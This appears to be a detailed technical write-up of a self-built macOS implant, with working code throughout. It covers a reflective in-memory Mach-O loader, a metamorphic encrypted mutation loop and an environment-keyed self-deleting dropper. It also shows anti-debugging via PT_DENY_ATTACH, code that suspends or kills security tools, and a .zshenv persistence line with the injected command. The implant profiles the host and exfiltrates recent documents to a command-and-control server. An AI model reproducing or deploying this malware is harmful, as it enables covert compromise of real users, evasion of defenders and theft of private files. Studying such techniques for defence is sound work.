$ nm -g lib/libloader.a | c++filt | grep "T isolator::ImageLoader::recursiveRebase\|T isolator::ImageLoader::recursiveBind\|T isolator::ImageLoader::runInitializers\|T isolator::ImageLoader::link"
0000000000002710 T isolator::ImageLoader::recursiveRebase(...)
00000000000029b0 T isolator::ImageLoader::recursiveBind(...)
0000000000001bd4 T isolator::ImageLoader::runInitializers(...)
0000000000000d78 T isolator::ImageLoader::link(...)
link() orchestrates the whole thing: rebase (fix up internal pointers for the ASLR slide), bind (resolve external symbol references), then runInitializers(), which calls doModInitFunctions() to execute any __mod_init_func constructors. For our wrapped Mach-Os this is mostly a no-op: wrap_macho() produces images with zeroed LC_DYLD_INFO_ONLY (no rebases, no binds, no exports), so the rebase and bind passes walk empty opcode streams and return immediately. But the machinery is there for images that need it.
The dyld_stubs.cpp module ([ReflectiveLoader/loader/src/dyld_stubs.cpp](https://github.com/pwardle/ReflectiveLoader/blob/main/loader/src/dyld_stubs.cpp)) provides the glue that the ImageLoader hierarchy expects from dyld’s runtime environment. In real dyld, the LinkContext structure contains function pointers for image notifications, error reporting, library loading, and symbol resolution. The stubs replace all of these with no-ops:
// dyld_stubs.cpp all callbacks silenced for OPSEC
void stub_notifySingle(dyld_image_states, const ImageLoader*,
ImageLoader::InitializerTimingList*) {}
void stub_notifyBatch(dyld_image_states state, bool preflightOnly) {}
void stub_setErrorStrings(unsigned errorCode, const char*, const char*,
const char*) {}
void stub_clearAllDepths() {}
unsigned int stub_imageCount() { return 0; }
void stub_addDynamicReference(ImageLoader*, ImageLoader*) {}
Even dyld::log() and dyld::warn() are empty no diagnostic output, no trace. The throwf() function throws an empty string instead of formatting an error message. The loaded image thinks it’s being managed by dyld. It isn’t.
The ImageLoaderProxy is how the library resolves symbols against the host process. When the loaded image needs a symbol from an already-loaded dylib (say, libSystem.B.dylib), the stub_flatExportFinder callback creates a proxy via ImageLoaderProxy::instantiate() that wraps the real dyld’s view of the process. custom_dlsym uses this to find exported symbols by walking the export trie the same trieWalk() algorithm Apple’s dyld uses:
// custom_dlfcn.cpp
extern "C" void *custom_dlsym(void *__handle, const char *__symbol) {
std::string underscoredName = "_" + std::string(__symbol);
const ImageLoader *image = reinterpret_cast<ImageLoader *>(__handle);
auto sym = image->findExportedSymbol(underscoredName.c_str(), true, &image);
if (sym != NULL) {
auto addr = image->getExportedSymbolAddress(
sym, g_linkContext, nullptr, false, underscoredName.c_str());
return reinterpret_cast<void *>(addr);
}
return nullptr;
}
The underscore prefix is there because Mach-O symbols are stored with a leading underscore (_main, _printf). findExportedSymbol walks the export trie, a compressed prefix tree in __LINKEDIT that maps symbol names to addresses. For our minimal wrapped images the trie is empty, but when loading real dylibs through the proxy, this is how external symbols get resolved.
Then there’s ObjCRuntime.cpp. If the loaded image contains Objective-C metadata (class lists in __objc_classlist, category lists in __objc_catlist, selector references in __objc_selrefs), the ObjC runtime needs to know about it. The registerObjC() function in custom_dlfcn.cpp handles this by extracting each ObjC section from the loaded image and feeding them to mull::objc::Runtime:
void registerObjC(ImageLoaderMachO *image) {
    mull::objc::Runtime runtime;
    const char *sections[] = {
        "__objc_selrefs", "__objc_classlist", "__objc_classrefs",
        "__objc_superrefs", "__objc_catlist"
    };
    for (const char *name : sections) {
        void *start; size_t size;
        /* metadata may live in __DATA or __DATA_CONST depending on toolchain */
        if (!image->getSectionContent("__DATA", name, &start, &size) &&
            !image->getSectionContent("__DATA_CONST", name, &start, &size))
            continue;
        /* record (start, size) for the runtime calls below */
    }
    runtime.registerSelectors(/* ... */);
    runtime.addClassesFromSection(/* ... */);
    runtime.registerClasses();
    runtime.addCategoriesFromSection(/* ... */);
}
It tries both __DATA and __DATA_CONST because Apple moved ObjC metadata to __DATA_CONST in newer toolchains for security (constant sections can be mapped read-only after initialization). For a pure-C payload this is unused, but the library supports it because the same loader could inject ObjC-based payloads; the PoC in ReflectiveLoader/PoC/ demonstrates exactly this, loading a .dylib that uses Foundation classes.
The whole thing links as a single static library:
LDFLAGS = lib/libloader.a -framework Foundation -framework CoreServices \
-framework Security -framework IOKit -lobjc -lz
The frameworks are there for the ObjC runtime registration and for APIs the payload uses (persistence via CoreServices, keychain via Security, hardware enumeration via IOKit). -lobjc links the ObjC runtime itself. -lz is for zlib-compressed LINKEDIT data in some Mach-O formats.
So when quiet_load() calls custom_dlopen_from_memory(buf, len), we’re running a complete Mach-O loader pipeline: header validation via sniffLoadCommands, segment mapping via vm_copy, rebase, bind, ObjC registration, static initializers; entirely in userspace, entirely from a memory buffer, with no filesystem interaction and no involvement from the real dyld. The loaded image appears in the process’s virtual address space but not in dyld’s image list.
_dyld_image_count() doesn’t see it. vmmap shows anonymous memory regions, not a named mapping. DYLD_PRINT_LIBRARIES doesn’t log it. For all practical purposes, the code doesn’t exist as a loaded library; it’s just bytes at an address that happen to be executable.
Once loaded, the code runs in a dedicated pthread to isolate it from the main thread’s stack and state:
static void *exec_thread(void *arg) {
inmem_binary_t *ib = (inmem_binary_t *)arg;
typedef int (*entry_fn_t)(void);
entry_fn_t entry = (entry_fn_t)((uint8_t*)ib->base_addr + ib->entry_offset);
int result = entry();
return (void*)(intptr_t)result;
}
int inmem_execute(inmem_binary_t *ib) {
if (!ib || !ib->base_addr) return -1;
pthread_t thread;
void *ret_val;
if (pthread_create(&thread, NULL, exec_thread, ib) != 0) return -1;
pthread_join(thread, &ret_val);
return (int)(intptr_t)ret_val;
}
The entry point is calculated as base_addr + entry_offset, where entry_offset came from LC_MAIN in the original binary’s load commands. The cast to a function pointer and the call through it is the moment mutated code becomes live. The separate thread means if the mutated code crashes (bad mutation, edge case in branch fixup), the main thread can catch it via the join return rather than dying.
This is where all of it connects into a self-mutating loop. Each generation feeds its output as the next generation’s input:
#define MAX_GEN 8
#define GROWTH 4
for (unsigned g = 0; g < MAX_GEN; g++) {
aether_rng_t rng;
aether_rng_init(&rng);
/* odd=expand, even=reshape */
size_t gen_max = (g & 1) ? max_sz : cur_sz;
size_t nsz = aether_mutate(code, cur_sz, gen_max, &rng, 7, passes, vm, vme);
if (!nsz) break;
cur_sz = nsz; /* mutated size becomes the current size */
/* Encrypt mutated code */
derive_next_key(prev_key, g, gen_key, gen_iv);
size_t enc_len = aes_encrypt(code, cur_sz, gen_key, gen_iv, &encrypted);
/* Wrap in Mach-O */
uint8_t *macho = wrap_macho(encrypted, enc_len, &macho_sz);
/* Reflective load with decryption */
void *h = quiet_load(macho, (int)macho_sz, gen_key, gen_iv);
/* Extract __text from loaded image > next generation's input */
struct section_64 *ns = find_text(macho);
if (ns && ns->size <= max_sz) {
memcpy(code, macho + ns->offset, ns->size);
cur_sz = ns->size;
}
}
Generation 0 reads the original __text from the binary on disk (via _NSGetExecutablePath + read_self()). The mutation engine transforms it. The result is AES-encrypted with a key derived from the code itself plus runtime entropy (mach_absolute_time() ^ getpid()). The encrypted blob is wrapped in a Mach-O, reflectively loaded (which decrypts it during load), and the decrypted code is extracted back as input for generation 1.
Each generation’s AES key is derived from the previous generation’s key, creating a key chain. Generation 0’s key comes from hashing the original stub code so the key material is tied to the binary’s identity. If someone patches the stub, the key derivation changes, and all subsequent generations fail to decrypt.
We suppress stdout during loading by redirecting fd 1 to /dev/null:
static void *quiet_load(void *buf, int len,
const uint8_t key[AES_KEY_SIZE],
const uint8_t iv[AES_IV_SIZE]) {
/* Decrypt __text in-place before loading */
if (key && iv) {
/* ... find __text section, decrypt with AES ... */
}
/* Silence any loader output */
int fd = dup(1), nul = open("/dev/null", O_WRONLY);
if (nul >= 0) { dup2(nul, 1); close(nul); }
void *h = custom_dlopen_from_memory(buf, len);
fflush(stdout);
if (fd >= 0) { dup2(fd, 1); close(fd); }
return h;
}
The final piece: a custom implementation of dlopen that operates on an in-memory buffer rather than a file path. It processes the Mach-O headers, maps segments with correct permissions, and returns a handle. This bypasses dyld entirely: no NSObjectFileImage, no NSLinkModule, no filesystem interaction. The function is declared in ld/custom_dlfcn.h alongside custom_dlsym for symbol resolution from the loaded image.
When the binary is done with a generation’s loaded image, inmem_free tears down both mappings:
void inmem_free(inmem_binary_t *ib) {
if (!ib) return;
if (ib->dual_mapped) {
if (ib->rw_addr)
vm_deallocate(mach_task_self(), (vm_address_t)ib->rw_addr, ib->size);
if (ib->base_addr)
vm_deallocate(mach_task_self(), (vm_address_t)ib->base_addr, ib->size);
} else {
if (ib->base_addr)
vm_deallocate(mach_task_self(), (vm_address_t)ib->base_addr, ib->size);
}
free(ib);
}
Both the RW and RX mappings are deallocated separately. vm_deallocate returns the virtual address range to the kernel the physical pages are freed when the last reference drops. For the dual-mapped case, deallocating the RW mapping doesn’t affect the RX mapping (they’re independent virtual entries pointing to shared physical pages), so both must be explicitly freed.
The entire reflective loading chain wrap_macho > inmem_load > inmem_execute never calls open(), write(), rename(), or any filesystem syscall. From the perspective of tools like fs_usage, dtrace with syscall::open*:entry, or Endpoint Security’s ES_EVENT_TYPE_NOTIFY_WRITE, the mutated code doesn’t exist. There’s no file to hash, no code signature to verify, no quarantine attribute to check.
The dual-mapping specifically defeats runtime memory scanners that look for RWX pages. There are no RWX pages. The RW pages contain code but aren’t executable. The RX pages are executable but were never directly written to (from the virtual address perspective). A scanner would need to correlate the two mappings by walking the vm_map entries and checking for shared physical page backing possible in theory via mach_vm_region_recurse, but no production EDR does this today.
After the N-generation cycle completes, a double-fork detaches the payload process:
pid_t p1 = fork();
if (p1 > 0) _exit(0); /* parent exits clean */
setsid();
pid_t p2 = fork();
if (p2 > 0) _exit(0); /* child exits */
/* grandchild: detached session leader, no controlling terminal */
close(STDIN_FILENO);
close(STDOUT_FILENO);
close(STDERR_FILENO);
payload_run();
The grandchild inherits the final generation’s memory state but has no parent process to trace back to. The original process exited cleanly. The intermediate child exited. The grandchild is a session leader with closed stdio, a daemon by the classic Unix definition. And its __text section looks nothing like what was on disk eight mutations ago.
- Objective-See: Reflective Code Loading on macOS
- macOS Reflective Code Loading Analysis
- vm_remap XNU kernel man page
- Jailed Just-in-Time Compilation on iOS (Saagar Jha)
- A Reflective Loader for macOS
Shenanigans
So far, we’ve covered how the engine mutates code and how the reflective loader maps it into memory. What remains is the operational workflow once it reaches a target. The engine executes in three primary stages: the dropper, the mut8 entry, and the payload.
The dropper is the only component that interacts with disk outside of operator control. It is a standalone Mach-O executable containing the AES-encrypted payload within a custom section.
extern unsigned char _foo_start[] __asm__("section$start$__DATA$__rsrc");
extern unsigned char _foo_end[] __asm__("section$end$__DATA$__rsrc");
The linker stuffs the AES-encrypted payload into __DATA,__rsrc. At runtime, the dropper checks the environment (domain suffix, network prefix, sentinel file) and runs those values through SHA-256 a bunch of times to get the AES key. Then it tries to decrypt the blob. If the magic number (0xfeedfacf) isn’t right (wrong env, bad key, corrupted blob), it just unlinks itself and quits. Silent, clean, no crashes.
Only the real target gets touched. If decryption works, the dropper drops the payload in a temp folder as p.dylib, dlopens it, finds the entry symbol __8d3942b93e489c7a with dlsym, calls it, then cleans up: dlclose, delete temp file, delete temp folder, delete itself. Gone. The dropper is disposable scaffolding.
We use the system dlopen here because libloader.a lives in the payload, not the dropper. The entry name looks like a random hex hash on purpose. Nothing matches it in symbol DBs. Only dlsym can see it. That’s it.
The key derivation deserves a shoutout: it’s why the dropper can’t run in a sandbox. In the classic version of this trick, target-specific stuff (folder GUIDs, registry values) gets hashed thousands of times. Wrong machine? Garbage bytes. Fails the magic check. The piece nukes itself.
We do the same thing, but with three factors: domain suffix, network prefix, and a sentinel file. All three have to match.
The operator fills these in at build time based on recon: job postings mention the VPN client, DNS records leak the domain, a quick port scan shows the internal range. The build tool takes those three strings, concatenates them with pipe delimiters, then runs SHA‑256 over the result about 1000 times.
The first 16 bytes become the AES key. The last 16 bytes become the IV.
Why not just use the hardware UUID or something? Because a UUID locks you to a single machine. Domain + network + file lets you target an entire organization. You build one dropper and it works on any machine inside E-Corp’s network that has their VPN client installed.
The TARGET_DOMAIN, TARGET_NETWORK, and TARGET_FILE names don’t mean anything special they’re just there for clarity. In real ops everything would be heavily obfuscated. Those strings get compiled into the dropper with -include at build time.
Of course this has its pros and cons. It’s not a panacea. Matter of fact, treat it like a challenge see if you can get the piece to run or decrypt on your own machine. There are ways. You just have to find them.
Knowing the target profile doesn’t help you decrypt the payload you still need to actually be on the target network, with the right hostname suffix and the sentinel file present.
And if you’re already there… well, you’re the target.
Once the dropper calls __8d3942b93e489c7a, we’re inside the stub. This is where the metamorphic engine kicks in. First thing it does:
int __8d3942b93e489c7a(int argc, char **argv) {
extern bool harden_check(void);
if (!harden_check()) return 1;
harden_check() calls deny_attach() then is_debugged().
deny_attach() resolves ptrace via dlsym (symbol XOR’d with 0x11), then calls ptrace(PT_DENY_ATTACH, 0, 0, 0) (syscall 26, request 31). Any debugger that tries to attach after this? SEGV. lldb, dtrace, Instruments all dead. Apple documents it in kernel source, but not in any public API. Same trick every iOS jailbreak detector uses, but we’re on macOS.
is_debugged() checks P_TRACED via sysctl. The sysctl symbol itself is resolved dynamically through dlsym with an XOR key, never linked statically, so nm shows nothing:
static int call_sysctl(int *mib, u_int cnt, void *old, size_t *oldsz) {
char sym[] = {0x73^0x20, 0x79^0x20, 0x73^0x20, 0x63^0x20,
0x74^0x20, 0x6C^0x20, 0};
for (int i = 0; sym[i]; i++) sym[i] ^= 0x20;
sysctl_fn fn = (sysctl_fn)dlsym(RTLD_DEFAULT, sym);
If either check fails, we return 1 and the dropper’s cleanup path runs. No self-destruct yet; that’s reserved for the payload phase. At this point, nothing’s planted, so the only cleanup needed is the dropper itself, which handles its own deletion.
- Defeating Anti-Debug Techniques: macOS ptrace variants — Alex O’Mara
- Debugging Apple binaries that use PT_DENY_ATTACH — knight.sc
- ptrace internals: How it prevents debugger attachment
- Objective-See: Anti-Debug in macOS malware
- Objective-See Products
Before we start sending anything out, we neutralize anything that might catch the traffic. The target list is 13 process names stored as DJB2 hashes, encrypted with ChaCha20. The key comes from the vault key. I won’t name them so Patrick Wardle doesn’t get mad :)
state[12] = 0; state[13] = 0x48554e54; /* "HUNT" */
At runtime it decrypts the table, enumerates processes via proc_listpids(PROC_ALL_PIDS), hashes each name with DJB2, and compares. No process names ever appear in the binary, not even encrypted. Just hashes of hashes.
Killing isn’t smart (tell that to the government): launchd just restarts. We check for plists in /Library/LaunchDaemons/ or ~/Library/LaunchAgents/. If present, the process is launchd-managed. Those get SIGSTOP. launchd sees them as “running” (no restart), but they’re frozen. Everything else: SIGTERM, wait 100ms, SIGKILL.
After neutralization we verify stopped processes are actually frozen, then the decrypted hash table is wiped immediately.
For the config strings, the usual suspects live in an encrypted vault: three entries, each ChaCha20-encrypted with a per-entry derived key. The master key hashes together the ChaCha20 sigma constants, the encrypted hunt table blob, all three vault nonces, and the ASLR slide. That last one is the key detail: the ASLR slide changes every execution, so the master key is different every time. You can’t extract the key from a memory dump of one execution and use it on another.
Why ChaCha20 for the vault instead of AES? Because ChaCha20 is a stream cipher: we decrypt exactly the bytes we need without padding, without block alignment, without a cipher context. The entire decryption is 15 lines with no heap allocation. AES-CBC would need CommonCrypto, which means more framework surface. The vault predates the RSA decision and there’s no reason to change it.
Persistence
After mutation and fork, the grandchild gets called. First thing it does is plant itself.
The binary relocates to ~/Library/Caches/.com.apple..<seed>/agent, where <seed> is a deterministic hex string derived from the machine’s hardware identity (IOPlatformUUID + serial, hashed). The same machine always gets the same path. That matters because cleanup needs to find the binary later without storing the path anywhere.
Why ~/Library/Caches/? It’s user-writable, expected to contain random Apple-looking directories, and most backup tools exclude it. The dot prefix hides it in Finder. The .com.apple. prefix blends in with “legitimate” Apple cache dirs. Run ls ~/Library/Caches/ and you’ll see dozens of .com.apple.* directories; you probably won’t notice ours.
Persistence is .zshenv. Not a LaunchAgent, not cron, not login items. .zshenv is sourced by zsh on EVERY invocation: interactive, non-interactive, scripts, Terminal.app, iTerm2, SSH, even system() calls from other programs if the default shell is zsh (which it is since Catalina). The most reliable persistence on modern macOS without root, at least in my book.
So we inject: [ -z "$(pgrep -xf '/path/to/agent')" ] && (exec {path} &>/dev/null &)
The pgrep guard prevents stacking. exec replaces the subshell, &>/dev/null suppresses output, & backgrounds it. The user sees nothing.
Every string fragment is built via volatile stack writes, so the compiler cannot fold them into .rodata:
char g1[9]; { volatile char *v=(volatile char*)g1;
v[0]=0x5b; v[1]=0x20; v[2]=0x2d; v[3]=0x7a; v[4]=0x20;
v[5]=0x22; v[6]=0x24; v[7]=0x28; v[8]=0; }
strings on the binary will never show pgrep, zshenv, exec, or any fragment of the persistence line.
The piece doesn’t do everything at once. The timing model is based on a marker file (.ts) storing the install timestamp. First run: relocate, install .zshenv, write the marker, exit. Nothing else. The binary has been on disk for zero seconds of suspicious activity.
Less than 1 hour since install? Exit immediately. We do literally nothing for an hour. After 1 hour we go active: hunt security tools, load curl via dlopen, decrypt the vault, fetch the dead-drop. The dead-drop is a pastebin/gist, so we fetch the pubkey, profile the host via sysctl (hostname, kernel, model, cpus, ram, user), encrypt it with an RSA hybrid envelope, and POST to C2.
After 2 hours, file collection: a Spotlight query for files modified or opened in the last 7 days matching target extensions (pdf, doc, docx, xls, xlsx, csv, ppt, key, pgp). Each file is individually packed, zlib-compressed, RSA+AES sealed, and POSTed to C2 with 30-90s of random jitter between files. Five retries with exponential backoff.
Then we strip our line from .zshenv, delete the binary, rmdir the cache dir. Gone. You could tune the timing to hide on the machine for a month or more, giving the implant time to gather as many new and old docs as possible. But yeah, you do you.
- Methods of Malware Persistence on Mac OS X
- How Malware Persists on macOS
- Mac Malware Persistence
- The Mac Malware of 2025
Exfil Crypto
The RSA hybrid envelope uses Security.framework exclusively. No OpenSSL, no LibreSSL, no dlopen’d libcrypto. I tried the dlopen route first: macOS blocks it with “loading libcrypto in an unsafe way” and aborts the process. Apple moved the system LibreSSL into the dyld shared cache and added a specific check preventing third-party binaries from loading it. Security.framework has no such restriction because it’s first-party and already linked.
The envelope works like PGP. Random AES-128 key and IV per file:
CCRandomGenerateBytes(aes_key, 16);
CCRandomGenerateBytes(iv, 16);
The data is encrypted with AES-128-CBC via CommonCrypto’s CCCrypt(). Then the 32-byte key material (key || IV) is encrypted with RSA-OAEP-SHA256 via SecKeyCreateEncryptedData():
CFDataRef ek_cf = SecKeyCreateEncryptedData(key,
kSecKeyAlgorithmRSAEncryptionOAEPSHA256, km_data, NULL);
Wire format: [4:ek_len][ek][4:ct_len][ct], lengths in network byte order. The operator’s server holds the RSA private key and reverses the process.
Why RSA-2048 and not curve25519? Because Security.framework supports RSA natively with zero additional code.
The PEM parser includes a custom base64 decoder built on the stack. We can’t use SecDecodeTransformCreate(): Apple deprecated the entire SecTransform API in macOS 13. We can’t use NSData base64 either: Objective-C runtime overhead. So we decode it ourselves: 20 lines, no heap for the decode table.